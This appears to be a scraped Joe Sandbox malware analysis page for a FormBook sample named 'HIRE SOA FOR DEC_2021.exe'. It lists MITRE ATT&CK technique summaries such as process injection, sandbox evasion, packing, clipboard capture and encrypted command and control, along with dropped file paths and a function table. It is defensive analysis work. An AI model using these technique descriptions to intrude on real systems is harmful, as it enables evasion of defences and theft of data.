Opcode Fuzzy Hash: cb7e3cccaedbdeb1bb52ccfc6add512762696aec928d9f649aba4086b3f8605c
Instruction Fuzzy Hash: D5F0F632600601BFE6251B55EC06F23BB6BEB44730F244315F628566D1DA62FC20C6F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HIRE SOA FOR DEC_2021.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nmdcx8dorpuxth4

C:\Users\user\AppData\Local\Temp\nslEC78.tmp

C:\Users\user\AppData\Local\Temp\nslEC79.tmp\sdxajjgxerh.dll

C:\Users\user\AppData\Local\Temp\yyyvokmb

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
HIRE SOA FOR DEC_2021.exe

Function 00403225 Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Function 004053AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 1AC70402 Relevance: 10.7, APIs: 7, Instructions: 196
filememoryCOMMON

Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 004035E3 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Function 00402C5B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 1AC70FF5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237
processthreadCOMMON

Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Function 728A103A Relevance: 10.6, APIs: 7, Instructions: 108
memoryfileCOMMON

Function 0040302C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 0040578B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 1AC707DD Relevance: 7.7, APIs: 5, Instructions: 192
fileCOMMON